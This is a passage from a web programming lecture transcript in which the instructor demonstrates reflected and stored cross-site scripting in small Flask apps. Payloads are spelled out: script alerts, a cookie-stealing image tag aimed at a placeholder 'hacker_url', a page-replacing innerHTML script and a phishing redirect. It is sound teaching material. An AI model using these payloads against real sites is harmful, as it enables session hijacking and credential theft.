1053 00:47:05,930 --> 00:47:09,254 And there is in fact, a major cross-site scripting 1054 00:47:09,254 --> 00:47:11,420 vulnerability inside this application, and see if we 1055 00:47:11,420 --> 00:47:13,320 can tease apart where exactly that is. 1056 00:47:13,320 --> 00:47:16,010 So at the beginning, we import Flask, and we import request, 1057 00:47:16,010 --> 00:47:17,780 which we'll need access to later. 1058 00:47:17,780 --> 00:47:22,430 We create a new Flask application inside the current module. 1059 00:47:22,430 --> 00:47:25,880 Then we define a default route, just when you go to the slash route. 1060 00:47:25,880 --> 00:47:29,120 It calls this index function that returns Hello, world. 1061 00:47:29,120 --> 00:47:32,420 And then down here, we have app.errorhandler(404). 1062 00:47:32,420 --> 00:47:34,640 So you may not have seen this before, but Flask 1063 00:47:34,640 --> 00:47:37,340 has built-in error handlers that are specific functions that 1064 00:47:37,340 --> 00:47:39,590 run when specific error codes happen. 1065 00:47:39,590 --> 00:47:41,930 So 404, you might recall, is the error code 1066 00:47:41,930 --> 00:47:44,210 for not found when someone goes to a page that 1067 00:47:44,210 --> 00:47:45,920 doesn't exist on the web server. 1068 00:47:45,920 --> 00:47:50,390 And what Flask can do for you is say whenever a 404 error happens on the web 1069 00:47:50,390 --> 00:47:54,230 server, go ahead and run this function, which is going to supposedly render 1070 00:47:54,230 --> 00:47:55,650 my 404 error page. 1071 00:47:55,650 --> 00:47:57,870 And you can do the same thing for error 500, 1072 00:47:57,870 --> 00:48:00,940 for example, internal server errors, or 403, forbidden errors, 1073 00:48:00,940 --> 00:48:02,806 or any other error status code you want.
1074 00:48:02,806 --> 00:48:05,180 If you want particular code to run, a particular template 1075 00:48:05,180 --> 00:48:09,470 to be displayed when a particular error code happens on your web application, 1076 00:48:09,470 --> 00:48:12,320 you can use Flask's built-in error handler 1077 00:48:12,320 --> 00:48:15,450 to be able to handle those particular situations. 1078 00:48:15,450 --> 00:48:18,650 So what we have here is a function that is supposed to handle 404 errors, 1079 00:48:18,650 --> 00:48:20,540 that handles a page not found error. 1080 00:48:20,540 --> 00:48:23,390 It calls this page not found function, and all the page not 1081 00:48:23,390 --> 00:48:26,670 found function is going to do is say return not found. 1082 00:48:26,670 --> 00:48:30,080 And then it's going to append request.path, where request.path 1083 00:48:30,080 --> 00:48:32,930 is what the URL was that the user tried to go 1084 00:48:32,930 --> 00:48:35,900 to that resulted in the 404 error. 1085 00:48:35,900 --> 00:48:38,070 And so what might that mean? 1086 00:48:38,070 --> 00:48:41,090 It means that if a user goes to /foo, for example, 1087 00:48:41,090 --> 00:48:43,150 then what's going to happen is-- 1088 00:48:43,150 --> 00:48:50,591 I'll go ahead and go into cross-site scripting zero 1089 00:48:50,591 --> 00:48:52,340 and go ahead and run this web application, 1090 00:48:52,340 --> 00:48:53,652 running that very same code. 1091 00:48:53,652 --> 00:48:55,860 So I get hello, world when I go to the default route, 1092 00:48:55,860 --> 00:48:58,110 don't type in anything after the URL. 1093 00:48:58,110 --> 00:49:02,276 But if I go to /foo for example, what do I expect to see? 1094 00:49:02,276 --> 00:49:03,374 AUDIENCE: Error not found. 1095 00:49:03,374 --> 00:49:04,040 BRIAN YU: Great. 1096 00:49:04,040 --> 00:49:08,300 Not Found: foo, because not found was the initial message that 1097 00:49:08,300 --> 00:49:10,340 happens when I do a 404 error message.
1098 00:49:10,340 --> 00:49:14,180 And then /foo is the path, the request path that I tried to request. 1099 00:49:14,180 --> 00:49:15,680 And so this might be pretty typical. 1100 00:49:15,680 --> 00:49:17,690 That if I go to a URL that doesn't exist, 1101 00:49:17,690 --> 00:49:20,510 I probably expect a page like this to show up that says, sorry, 1102 00:49:20,510 --> 00:49:22,760 this route, this path that you were trying to request, 1103 00:49:22,760 --> 00:49:25,650 couldn't be found on the web server. 1104 00:49:25,650 --> 00:49:27,750 So what can go wrong there? 1105 00:49:27,750 --> 00:49:31,660 Here's the web application, where's the security vulnerability? 1106 00:49:31,660 --> 00:49:32,160 Yeah? 1107 00:49:32,160 --> 00:49:37,050 AUDIENCE: So someone maybe could somehow inject a script path 1108 00:49:37,050 --> 00:49:42,269 into your request path location. 1109 00:49:42,269 --> 00:49:43,310 BRIAN YU: Great, exactly. 1110 00:49:43,310 --> 00:49:45,920 So the vulnerability is with this request path. 1111 00:49:45,920 --> 00:49:51,260 That if someone is able to inject JavaScript code into this request 1112 00:49:51,260 --> 00:49:54,530 path, now suddenly, the thing that I'm returning 1113 00:49:54,530 --> 00:49:57,650 is not found colon, potentially some JavaScript 1114 00:49:57,650 --> 00:49:59,180 code that is then going to be run. 1115 00:49:59,180 --> 00:50:02,750 And you might imagine that if a hacker now is able to take one of these URLs 1116 00:50:02,750 --> 00:50:06,370 and convince a user to click on a link that takes them to a URL like that, 1117 00:50:06,370 --> 00:50:10,280 that takes them to this particular function in my Flask application, now 1118 00:50:10,280 --> 00:50:13,370 suddenly this hacker is able to run whatever JavaScript code they 1119 00:50:13,370 --> 00:50:15,980 want to inside of the web application. 1120 00:50:15,980 --> 00:50:17,340 So what might that look like? 
1121 00:50:17,340 --> 00:50:22,030 Instead of just going to /foo as the route that returns a benign not found 1122 00:50:22,030 --> 00:50:30,020 /foo on the page, what if, for instance, the user typed in this as their URL? 1123 00:50:30,020 --> 00:50:36,320 Where after the slash, they type script alert hi /script, end JavaScript. 1124 00:50:36,320 --> 00:50:39,170 Now this is going to be the request path, which 1125 00:50:39,170 --> 00:50:42,290 means what gets put into return not found colon, 1126 00:50:42,290 --> 00:50:44,270 we're going to return some page that says not 1127 00:50:44,270 --> 00:50:46,700 found and then this JavaScript code. 1128 00:50:46,700 --> 00:50:51,400 This JavaScript code that says alert, hi. 1129 00:50:51,400 --> 00:50:53,570 So this is code now that if someone clicks on, 1130 00:50:53,570 --> 00:50:56,532 might potentially be executed by this web browser, 1131 00:50:56,532 --> 00:50:57,990 an example of cross-site scripting. 1132 00:50:57,990 --> 00:51:00,290 That someone is able to send me this link, 1133 00:51:00,290 --> 00:51:03,290 and they were able to inject random JavaScript, whatever they want, 1134 00:51:03,290 --> 00:51:05,550 into this particular application. 1135 00:51:05,550 --> 00:51:07,620 So let's try it. 1136 00:51:07,620 --> 00:51:10,220 So again, going to /foo, says Not Found, foo. 1137 00:51:10,220 --> 00:51:13,790 If I do a /bar, it says Not Found bar. 1138 00:51:13,790 --> 00:51:20,780 What's going to happen if I do script alert hi /script? 1139 00:51:20,780 --> 00:51:23,270 So here's my URL now. 1140 00:51:23,270 --> 00:51:28,220 Rather than type in foo or bar, I've added this JavaScript code 1141 00:51:28,220 --> 00:51:30,470 to the URL and I'm going to try and run that. 1142 00:51:30,470 --> 00:51:32,363 What's going to happen? 1143 00:51:32,363 --> 00:51:34,112 AUDIENCE: An alert. 1144 00:51:34,112 --> 00:51:35,070 AUDIENCE: Get an alert. 1145 00:51:35,070 --> 00:51:35,790 BRIAN YU: We'll get an alert.
1146 00:51:35,790 --> 00:51:37,710 That's what we expect to happen, at least. 1147 00:51:37,710 --> 00:51:40,680 In fact, Chrome is getting pretty good at this. 1148 00:51:40,680 --> 00:51:43,380 Chrome and other web browsers have built-in security features. 1149 00:51:43,380 --> 00:51:44,760 So Chrome actually stopped me. 1150 00:51:44,760 --> 00:51:47,700 It gave me this page that says, this page isn't working. 1151 00:51:47,700 --> 00:51:49,800 Chrome detected unusual code on this page 1152 00:51:49,800 --> 00:51:52,020 and blocked it to protect your personal information, 1153 00:51:52,020 --> 00:51:54,353 for example, passwords, phone numbers, and credit cards. 1154 00:51:54,353 --> 00:51:57,930 And if we look down here, it says error, blocked by XSS, 1155 00:51:57,930 --> 00:52:01,980 or cross-site scripting, error blocked by cross-site scripting auditor. 1156 00:52:01,980 --> 00:52:03,900 So Chrome's got some built-in feature here 1157 00:52:03,900 --> 00:52:06,150 that's checking for potential cross-site scripting, 1158 00:52:06,150 --> 00:52:08,400 like what we just tried to do, and it's blocking me 1159 00:52:08,400 --> 00:52:09,924 from getting access to this page. 1160 00:52:09,924 --> 00:52:12,840 And this defends against certainly some kinds of cross-site scripting, 1161 00:52:12,840 --> 00:52:13,560 but not all. 1162 00:52:13,560 --> 00:52:17,610 And we'll see an example of one which bypasses Chrome in just a moment. 1163 00:52:17,610 --> 00:52:19,710 And certainly you can't rely on all web browsers 1164 00:52:19,710 --> 00:52:22,860 to be able to have this built-in cross-site scripting auditor built in, 1165 00:52:22,860 --> 00:52:25,800 so these are definitely still things to be careful about. 1166 00:52:25,800 --> 00:52:29,070 So what would happen if this auditor didn't exist, if it wasn't in place? 1167 00:52:29,070 --> 00:52:30,420 We can actually find out. 
1168 00:52:30,420 --> 00:52:33,780 Chrome actually lets us do that: if I run Chrome from the command line 1169 00:52:33,780 --> 00:52:38,640 and run chrome --disable-xss-auditor, 1170 00:52:38,640 --> 00:52:41,640 I can run Chrome without running the cross-site scripting auditor. 1171 00:52:41,640 --> 00:52:43,230 Just turn that auditor off. 1172 00:52:43,230 --> 00:52:47,970 And now if I go here, slash script alert hi, just like I did before, 1173 00:52:47,970 --> 00:52:51,810 and press Return, now I get the alert that says hi. 1174 00:52:51,810 --> 00:52:54,390 I've injected JavaScript code into this page, 1175 00:52:54,390 --> 00:52:57,300 and after I press OK, now it says not found, slash. 1176 00:52:57,300 --> 00:53:00,270 And of course that seemed relatively benign, 1177 00:53:00,270 --> 00:53:02,040 that an alert certainly showed up. 1178 00:53:02,040 --> 00:53:05,010 JavaScript code was running, but nothing was really compromised. 1179 00:53:05,010 --> 00:53:06,900 So where might this go wrong? 1180 00:53:06,900 --> 00:53:09,150 Where could this really become a problem? 1181 00:53:09,150 --> 00:53:14,170 Can anyone think of why this might really start to become an issue? 1182 00:53:14,170 --> 00:53:15,670 Injecting arbitrary JavaScript code. 1183 00:53:15,670 --> 00:53:15,900 Yeah? 1184 00:53:15,900 --> 00:53:17,960 AUDIENCE: An executable could be put in there. 1185 00:53:17,960 --> 00:53:18,626 BRIAN YU: Great. 1186 00:53:18,626 --> 00:53:21,480 Any executable thing could be put into this JavaScript code 1187 00:53:21,480 --> 00:53:23,070 so that any code could run. 1188 00:53:23,070 --> 00:53:26,070 And in particular, that means that anything 1189 00:53:26,070 --> 00:53:29,160 could happen on the web browser, including potentially 1190 00:53:29,160 --> 00:53:31,650 secure information being exposed.
1191 00:53:31,650 --> 00:53:36,036 And so in the case of Flask and when we talked about logging 1192 00:53:36,036 --> 00:53:38,410 in and logging out, we've talked about this a little bit, 1193 00:53:38,410 --> 00:53:40,650 how does the browser know-- 1194 00:53:40,650 --> 00:53:44,100 or when the server is-- when someone logs into a website 1195 00:53:44,100 --> 00:53:46,290 and the server says, OK, this user is now logged in. 1196 00:53:46,290 --> 00:53:49,331 When I go and click on another button, how does the browser or the server 1197 00:53:49,331 --> 00:53:51,830 still know that I'm the one logged into the website? 1198 00:53:51,830 --> 00:53:52,770 AUDIENCE: Session. 1199 00:53:52,770 --> 00:53:54,145 BRIAN YU: The session, certainly. 1200 00:53:54,145 --> 00:53:55,075 And how does that-- 1201 00:53:55,075 --> 00:53:58,741 or what do we know from the-- what's happening on the client side? 1202 00:53:58,741 --> 00:54:00,990 How does it know that it's coming from the same place? 1203 00:54:00,990 --> 00:54:03,450 That it's the same user that's making that request? 1204 00:54:03,450 --> 00:54:04,650 AUDIENCE: It's in a cookie. 1205 00:54:04,650 --> 00:54:06,066 BRIAN YU: Inside of a cookie, yes. 1206 00:54:06,066 --> 00:54:09,364 So that we've got some cookie, some information, stored in our computer. 1207 00:54:09,364 --> 00:54:12,280 That is the cookie that tells the server-- it's like a hand stamp that 1208 00:54:12,280 --> 00:54:13,236 says, yes, this is me. 1209 00:54:13,236 --> 00:54:15,360 Show me the same page that I was looking at before. 1210 00:54:15,360 --> 00:54:16,550 I'm still logged in. 1211 00:54:16,550 --> 00:54:19,696 And we talked about if someone were ever to get access to that cookie, 1212 00:54:19,696 --> 00:54:21,320 then they would be able to login as us. 
1213 00:54:21,320 --> 00:54:24,060 They could pretend to be us and therefore use our credentials, 1214 00:54:24,060 --> 00:54:26,310 and the server wouldn't be able to tell the difference 1215 00:54:26,310 --> 00:54:28,590 because that cookie is a valid cookie, for instance. 1216 00:54:28,590 --> 00:54:31,270 And so let's take a look now at what happens if it wasn't 1217 00:54:31,270 --> 00:54:36,030 this script that was being passed into the application, but this script. 1218 00:54:36,030 --> 00:54:38,440 Slightly different, slightly more complicated. 1219 00:54:38,440 --> 00:54:41,370 We've got script, so we're starting JavaScript. 1220 00:54:41,370 --> 00:54:45,030 We say document.write, which is just a way of writing 1221 00:54:45,030 --> 00:54:48,960 new information, new text, into the HTML content of the page, 1222 00:54:48,960 --> 00:54:51,870 and we're adding an image, which seems sort of strange. 1223 00:54:51,870 --> 00:54:55,080 Image source equals hacker URL, where hacker URL 1224 00:54:55,080 --> 00:54:57,930 is some URL of some hacker's website. 1225 00:54:57,930 --> 00:55:03,177 And cookie equals, and then we added document.cookie, 1226 00:55:03,177 --> 00:55:05,760 which is going to represent the cookie for this particular web 1227 00:55:05,760 --> 00:55:07,920 browser, this particular page. 1228 00:55:07,920 --> 00:55:11,010 And then the closing angle bracket, and that's the end of the JavaScript. 1229 00:55:11,010 --> 00:55:17,190 We effectively just added an image tag into the page where the source of that 1230 00:55:17,190 --> 00:55:23,024 image is supposedly hacker_url?cookie=document.cookie. 1231 00:55:23,024 --> 00:55:23,940 Why is that a problem? 1232 00:55:23,940 --> 00:55:25,250 What's just happened here? 1233 00:55:25,250 --> 00:55:25,750 Yeah? 1234 00:55:25,750 --> 00:55:27,833 AUDIENCE: You're going to hit the hacker's website 1235 00:55:27,833 --> 00:55:31,650 and pass your cookie as a [INAUDIBLE]. 1236 00:55:31,650 --> 00:55:32,400 BRIAN YU: Exactly.
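To make concrete why a request to hacker_url?cookie=... leaks the cookie, here is a small sketch of both ends of that request. Everything in it is an assumption for illustration: `HACKER_URL` is a made-up address, the cookie value is invented, and the two helper functions are hypothetical names, not part of any library.

```python
from urllib.parse import parse_qs, quote, urlsplit

HACKER_URL = "https://hacker.example/log"  # hypothetical attacker endpoint


def image_src(cookie: str) -> str:
    # The URL the injected image tag would request:
    # the cookie rides along as an ordinary GET parameter.
    return f"{HACKER_URL}?cookie={quote(cookie)}"


def cookie_from_logged_url(url: str) -> str:
    # What the attacker can recover just by reading the request log.
    return parse_qs(urlsplit(url).query)["cookie"][0]


logged = image_src("session=abc123")
print(logged)
print(cookie_from_logged_url(logged))
```

No image ever needs to load; the request itself is enough to deliver the value to whoever runs that server.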
1237 00:55:32,400 --> 00:55:36,002 We're going to hit the hacker's website, and any time we're 1238 00:55:36,002 --> 00:55:38,460 making a request to that server, that server is potentially 1239 00:55:38,460 --> 00:55:40,650 logging exactly what URL was requested. 1240 00:55:40,650 --> 00:55:43,200 In fact, if you've been using Flask or Django all this time 1241 00:55:43,200 --> 00:55:44,908 and you've looked at the terminal window, 1242 00:55:44,908 --> 00:55:47,439 you've probably noticed over here that you've 1243 00:55:47,439 --> 00:55:49,730 been able to see every single request that's been made. 1244 00:55:49,730 --> 00:55:54,510 Here was a GET request to the URL slash, here's a GET request to the URL /foo, 1245 00:55:54,510 --> 00:55:56,870 here's a GET request to the URL /bar. 1246 00:55:56,870 --> 00:56:01,140 And so if our hacker is carefully monitoring all of the requests 1247 00:56:01,140 --> 00:56:04,920 to the server over here at hacker URL, they're going to notice something like 1248 00:56:04,920 --> 00:56:09,480 someone made a request to hacker_url?cookie= and then some 1249 00:56:09,480 --> 00:56:10,200 cookie, right? 1250 00:56:10,200 --> 00:56:13,620 So by injecting this JavaScript code into the user's web browser 1251 00:56:13,620 --> 00:56:16,470 and having this run, they've added this image tag that's 1252 00:56:16,470 --> 00:56:18,810 going to make a request to hacker_url and is 1253 00:56:18,810 --> 00:56:21,480 going to pass this information, that cookie-- so now 1254 00:56:21,480 --> 00:56:23,610 the cookie that was originally on your computer, 1255 00:56:23,610 --> 00:56:27,210 someone else now has access to because you've now just put it inside 1256 00:56:27,210 --> 00:56:29,185 of some request that's going elsewhere. 1257 00:56:29,185 --> 00:56:32,310 And that's why Chrome was giving us that error, that warning message about, 1258 00:56:32,310 --> 00:56:32,940 well, be careful. 
1259 00:56:32,940 --> 00:56:35,898 We tried to block you from being able to see this page because it looks 1260 00:56:35,898 --> 00:56:38,770 like someone might be able to inject JavaScript code that 1261 00:56:38,770 --> 00:56:41,860 might be able to steal your passwords or other information. 1262 00:56:41,860 --> 00:56:46,660 Because any information, we can just send in a request to some other URL, 1263 00:56:46,660 --> 00:56:47,930 in this case. 1264 00:56:47,930 --> 00:56:50,890 And so this is really the danger of cross-site scripting, this ability 1265 00:56:50,890 --> 00:56:55,090 to inject JavaScript into any arbitrary page. 1266 00:56:55,090 --> 00:56:57,689 Questions about any of that? 1267 00:56:57,689 --> 00:56:58,480 AUDIENCE: Question. 1268 00:56:58,480 --> 00:56:59,020 BRIAN YU: Great. 1269 00:56:59,020 --> 00:56:59,530 Yeah? 1270 00:56:59,530 --> 00:57:01,155 AUDIENCE: What did they do with cookie? 1271 00:57:01,155 --> 00:57:01,951 I mean-- 1272 00:57:01,951 --> 00:57:02,950 BRIAN YU: Good question. 1273 00:57:02,950 --> 00:57:04,160 What can we do with the cookie? 1274 00:57:04,160 --> 00:57:06,243 So once you have the cookie, you could potentially 1275 00:57:06,243 --> 00:57:08,950 use that to login as someone else, for instance. 1276 00:57:08,950 --> 00:57:12,200 Or any secure information that's stored in that cookie, you'd have access to. 1277 00:57:12,200 --> 00:57:15,954 So if there are secure pieces of data stored in the cookie, 1278 00:57:15,954 --> 00:57:17,620 then that's potentially a vulnerability. 1279 00:57:17,620 --> 00:57:19,872 And we talked about in last lecture, I believe, 1280 00:57:19,872 --> 00:57:21,580 how Flask gives you the option of, if you 1281 00:57:21,580 --> 00:57:24,880 want to, storing all of your session information inside of a cookie. 
1282 00:57:24,880 --> 00:57:28,760 Which means secure information about the contents of your shopping cart 1283 00:57:28,760 --> 00:57:30,550 or how much money you have in your account 1284 00:57:30,550 --> 00:57:32,440 might be stored inside of that cookie, which 1285 00:57:32,440 --> 00:57:34,090 could potentially be a vulnerability. 1286 00:57:34,090 --> 00:57:36,020 But even if that's not there, at minimum, 1287 00:57:36,020 --> 00:57:38,860 that cookie is a way of convincing the server 1288 00:57:38,860 --> 00:57:40,970 that someone else is who you are. 1289 00:57:40,970 --> 00:57:44,260 If they steal your cookie, they can convince the server that they are you. 1290 00:57:44,260 --> 00:57:45,790 And then they can have access to your account 1291 00:57:45,790 --> 00:57:48,550 on whatever web application this is and potentially do whatever 1292 00:57:48,550 --> 00:57:50,725 they want with that information. 1293 00:57:50,725 --> 00:57:56,170 AUDIENCE: Would that be time bound with the-- like with that session, 1294 00:57:56,170 --> 00:57:58,150 that you'd have to use it for the next session? 1295 00:57:58,150 --> 00:57:59,090 BRIAN YU: Good question. 1296 00:57:59,090 --> 00:57:59,810 Would it be time bounded? 1297 00:57:59,810 --> 00:58:00,935 It quite possibly could be. 1298 00:58:00,935 --> 00:58:02,920 That if I were to log out for instance and now 1299 00:58:02,920 --> 00:58:05,830 the server forgets about that cookie, now suddenly we've 1300 00:58:05,830 --> 00:58:08,230 been able to avert this scenario, or this is no longer 1301 00:58:08,230 --> 00:58:09,279 going to be a valid way. 1302 00:58:09,279 --> 00:58:12,070 But if they can convince me to click on the URL again the next time 1303 00:58:12,070 --> 00:58:15,590 I log into the site, now it suddenly becomes a problem all over again. 
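One common hardening step, not covered in the lecture itself, is to mark the session cookie so that page scripts cannot read it and so that it expires on its own. The sketch below uses Python's standard `http.cookies` module; the cookie name `session`, the value, and the one-hour lifetime are assumptions chosen for illustration.

```python
from http.cookies import SimpleCookie


def session_cookie_header(session_id: str) -> str:
    cookie = SimpleCookie()
    cookie["session"] = session_id
    cookie["session"]["httponly"] = True  # not exposed through document.cookie
    cookie["session"]["secure"] = True    # only sent over HTTPS
    cookie["session"]["max-age"] = 3600   # browser discards it after an hour
    return cookie["session"].OutputString()


header = session_cookie_header("abc123")
print(header)
```

This limits what injected JavaScript can steal and how long a stolen cookie stays useful, but it does not remove the underlying cross-site scripting problem.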
1304 00:58:15,590 --> 00:58:17,590 And so we'll want to think carefully about, when 1305 00:58:17,590 --> 00:58:20,480 we're using JavaScript inside of our web applications, 1306 00:58:20,480 --> 00:58:22,610 is there a place where we might be vulnerable. 1307 00:58:22,610 --> 00:58:26,470 In fact, our original web application didn't even have any JavaScript in it 1308 00:58:26,470 --> 00:58:27,320 at all. 1309 00:58:27,320 --> 00:58:30,760 It was really just Flask and returning text. 1310 00:58:30,760 --> 00:58:34,900 But still, a malicious hacker was able to inject JavaScript into our page 1311 00:58:34,900 --> 00:58:38,552 just because we were including that raw JavaScript in there as well. 1312 00:58:38,552 --> 00:58:40,510 So these are certainly things to be mindful of. 1313 00:58:40,510 --> 00:58:43,180 And both Flask and Django have ways of making sure 1314 00:58:43,180 --> 00:58:46,960 that when you're inserting information, it's inserted in a safe way such 1315 00:58:46,960 --> 00:58:50,200 that we escape any potential JavaScript characters to help 1316 00:58:50,200 --> 00:58:51,980 avoid these types of situations. 1317 00:58:51,980 --> 00:58:54,010 But these are just good things to be mindful of 1318 00:58:54,010 --> 00:58:59,110 and be careful about as we go about designing these web applications. 1319 00:58:59,110 --> 00:59:02,770 Let's go ahead and take another look at another example of cross-site scripting 1320 00:59:02,770 --> 00:59:04,420 and how it can happen. 1321 00:59:04,420 --> 00:59:07,269 What I will look at now is a slightly more complicated site, 1322 00:59:07,269 --> 00:59:09,310 and this is one that Chrome is actually not going 1323 00:59:09,310 --> 00:59:11,150 to be able to fully defend against. 1324 00:59:11,150 --> 00:59:16,090 And what cross-site scripting one is is it's 1325 00:59:16,090 --> 00:59:19,472 a web application that is going to display a message list. 1326 00:59:19,472 --> 00:59:20,680 It's sort of a message board. 
1327 00:59:20,680 --> 00:59:23,380 We saw a brief example of something that looked very similar to this 1328 00:59:23,380 --> 00:59:25,000 when we were first taking a look at Flask 1329 00:59:25,000 --> 00:59:26,999 and how we're able to render templates and such. 1330 00:59:26,999 --> 00:59:28,600 This one actually uses a database. 1331 00:59:28,600 --> 00:59:31,550 And I'll show you what it looks like. 1332 00:59:31,550 --> 00:59:33,460 We'll look at application.py. 1333 00:59:33,460 --> 00:59:35,699 So I have a SQLite database that I'm going 1334 00:59:35,699 --> 00:59:38,365 to be using that's just going to store a whole bunch of messages 1335 00:59:38,365 --> 00:59:40,750 so that it can be on this public message board. 1336 00:59:40,750 --> 00:59:44,590 And effectively, I have just one route, a default index route, 1337 00:59:44,590 --> 00:59:48,550 where if I'm just viewing this page by a GET request, 1338 00:59:48,550 --> 00:59:51,777 just asking to see the page, I skip over this post stuff, 1339 00:59:51,777 --> 00:59:53,110 and I just get all the messages. 1340 00:59:53,110 --> 00:59:57,040 Selecting star from messages, just get all the messages in the message board. 1341 00:59:57,040 --> 01:00:00,310 And then go ahead and render this template, index.html passing 1342 01:00:00,310 --> 01:00:01,870 in those messages. 1343 01:00:01,870 --> 01:00:05,830 And then, if it's a post request, then I'm 1344 01:00:05,830 --> 01:00:09,940 going to get whatever the contents of the message that I'm trying to add 1345 01:00:09,940 --> 01:00:12,340 is, whatever came in through this form, and then I'm 1346 01:00:12,340 --> 01:00:16,730 going to insert into my messages table, whatever that content is. 1347 01:00:16,730 --> 01:00:20,350 So if I type in a new message and insert it, I submit that via a post request. 1348 01:00:20,350 --> 01:00:22,890 It gets added to my list of growing messages. 
1349 01:00:22,890 --> 01:00:25,270 And otherwise, if I'm just requesting the page normally, 1350 01:00:25,270 --> 01:00:27,732 or even after something is done being inserted, 1351 01:00:27,732 --> 01:00:29,440 I'm going to request for all the messages 1352 01:00:29,440 --> 01:00:32,800 by selecting it all from the database and then rendering it inside 1353 01:00:32,800 --> 01:00:34,690 of index.html. 1354 01:00:34,690 --> 01:00:36,100 So what does that look like? 1355 01:00:36,100 --> 01:00:38,890 The result is that using just these couple of lines of code, 1356 01:00:38,890 --> 01:00:42,820 I now have this Message List site where I can type in foo as a message, 1357 01:00:42,820 --> 01:00:43,650 submit that. 1358 01:00:43,650 --> 01:00:46,600 And now the message foo is there, bar goes in there, 1359 01:00:46,600 --> 01:00:48,670 and this gets added to the public message board. 1360 01:00:48,670 --> 01:00:51,887 And of course, if I were to close this site and I were to open it again 1361 01:00:51,887 --> 01:00:54,220 or someone else were to open it again on their computer, 1362 01:00:54,220 --> 01:00:57,670 because it's all drawing from the same database, now I go back here again. 1363 01:00:57,670 --> 01:01:00,920 Foo and bar are still there, so those messages are still there. 1364 01:01:00,920 --> 01:01:08,958 And so where is the opportunity for cross-site scripting attacks here? 1365 01:01:08,958 --> 01:01:12,201 AUDIENCE: You could store a script in the database. 1366 01:01:12,201 --> 01:01:12,950 BRIAN YU: Exactly. 1367 01:01:12,950 --> 01:01:16,840 We could store a script in the database, a script could be one of the messages. 1368 01:01:16,840 --> 01:01:19,820 Such that that JavaScript code gets just inserted 1369 01:01:19,820 --> 01:01:23,094 into the HTML contents of this page here, 1370 01:01:23,094 --> 01:01:24,510 and then it could potentially run. 
1371 01:01:24,510 --> 01:01:31,460 So if I were to add a message that was like, script alert hi /script, 1372 01:01:31,460 --> 01:01:35,214 and then submit that, well, what seems to happen here is that when I try 1373 01:01:35,214 --> 01:01:37,130 and submit it, Chrome is giving me some error. 1374 01:01:37,130 --> 01:01:39,880 It's giving me that same error as before, this page isn't working. 1375 01:01:39,880 --> 01:01:41,089 Chrome detected unusual code. 1376 01:01:41,089 --> 01:01:43,921 Here's that cross-site scripting auditor saying, hey, wait a minute, 1377 01:01:43,921 --> 01:01:44,880 something's wrong. 1378 01:01:44,880 --> 01:01:48,320 And the reason it was able to do that is because when 1379 01:01:48,320 --> 01:01:50,600 I was submitting my request, there was some JavaScript 1380 01:01:50,600 --> 01:01:52,100 included inside that request. 1381 01:01:52,100 --> 01:01:53,937 So Chrome was able to detect that something 1382 01:01:53,937 --> 01:01:57,020 might be a little fishy there, that I was submitting this JavaScript along 1383 01:01:57,020 --> 01:01:59,186 with the request, and then it was coming back to me. 1384 01:01:59,186 --> 01:02:04,370 So what about if I were to close the page and open it again. 1385 01:02:04,370 --> 01:02:06,050 Now I'm just requesting the page. 1386 01:02:06,050 --> 01:02:08,672 There's no JavaScript in the URL, and all that's happening 1387 01:02:08,672 --> 01:02:10,880 is that it's extracting information from the database 1388 01:02:10,880 --> 01:02:12,590 and displaying it onto the page. 1389 01:02:12,590 --> 01:02:14,630 And so Chrome now has no real way of knowing 1390 01:02:14,630 --> 01:02:17,360 that there is any potential cross-site scripting involved. 1391 01:02:17,360 --> 01:02:19,940 So I go here, and now I get the hi alert. 1392 01:02:19,940 --> 01:02:22,815 They were able to run arbitrary JavaScript on this page. 
1393 01:02:22,815 --> 01:02:25,190 And then I see foo and bar and then just some empty thing 1394 01:02:25,190 --> 01:02:28,920 because that's where the JavaScript code was before. 1395 01:02:28,920 --> 01:02:33,470 So here's an example of us being able to add a cross-site scripting 1396 01:02:33,470 --> 01:02:37,040 vulnerability that we were able to take advantage of, exploit, by just adding 1397 01:02:37,040 --> 01:02:39,720 JavaScript code into here as well. 1398 01:02:39,720 --> 01:02:43,085 And so I haven't been committing these changes to the database. 1399 01:02:43,085 --> 01:02:44,210 I haven't been saving them. 1400 01:02:44,210 --> 01:02:47,390 So if I run this again, we'll be reset back to a clean slate. 1401 01:02:47,390 --> 01:02:49,984 So if I go back here, I see a blank message list again. 1402 01:02:49,984 --> 01:02:52,400 So what are some other things that I could potentially do? 1403 01:02:52,400 --> 01:02:57,080 Well, I might be able to say someone does foo and then bar. 1404 01:02:57,080 --> 01:02:58,540 Maybe I could say-- 1405 01:02:58,540 --> 01:03:00,540 I just want to display whatever contents I want. 1406 01:03:00,540 --> 01:03:03,905 So I'm going to add JavaScript that says document.body.innerHTML 1407 01:03:03,905 --> 01:03:14,149 equals whatever page I want, /script, and I submit that. 1408 01:03:14,149 --> 01:03:16,190 Again, Chrome blocks it the first time because it 1409 01:03:16,190 --> 01:03:17,660 detects that, with this request at least, 1410 01:03:17,660 --> 01:03:19,345 there was something fishy going on. 1411 01:03:19,345 --> 01:03:22,220 But when the next request comes in, when the next person comes along, 1412 01:03:22,220 --> 01:03:24,489 they open this page, now message list is gone. 1413 01:03:24,489 --> 01:03:26,780 I don't see foo and bar or any of those other messages. 1414 01:03:26,780 --> 01:03:29,780 I just see whatever the contents of the page that I wanted to show was.
1415 01:03:29,780 --> 01:03:32,387 And that gets displayed to the user here. 1416 01:03:32,387 --> 01:03:34,220 So that's certainly one thing they could do. 1417 01:03:34,220 --> 01:03:37,428 Certainly stealing cookies is another thing that could happen in the same way 1418 01:03:37,428 --> 01:03:38,970 that we saw it in the last example. 1419 01:03:38,970 --> 01:03:40,490 Or someone could say, you know what? 1420 01:03:40,490 --> 01:03:42,650 Let's just take the user to an entirely different site. 1421 01:03:42,650 --> 01:03:45,980 Let's take them to my site where I can now try and steal information from them 1422 01:03:45,980 --> 01:03:49,990 as well by saying window.location equals, 1423 01:03:49,990 --> 01:03:54,620 and I can say cs50.github.io/web. 1424 01:03:54,620 --> 01:03:59,012 And so now this window.location equals some URL is the JavaScript code 1425 01:03:59,012 --> 01:03:59,720 that I'm running. 1426 01:03:59,720 --> 01:04:00,660 I'll submit that. 1427 01:04:00,660 --> 01:04:03,470 And when the next user comes along and they try and go to my page, 1428 01:04:03,470 --> 01:04:04,670 now they're suddenly redirected. 1429 01:04:04,670 --> 01:04:06,350 I've taken them somewhere else entirely. 1430 01:04:06,350 --> 01:04:09,190 And if that other new page looks sort of similar to the old page, 1431 01:04:09,190 --> 01:04:11,690 they might be tricked into thinking it is the same old page. 1432 01:04:11,690 --> 01:04:14,939 And they might be interacting with it, typing in their credentials, usernames, 1433 01:04:14,939 --> 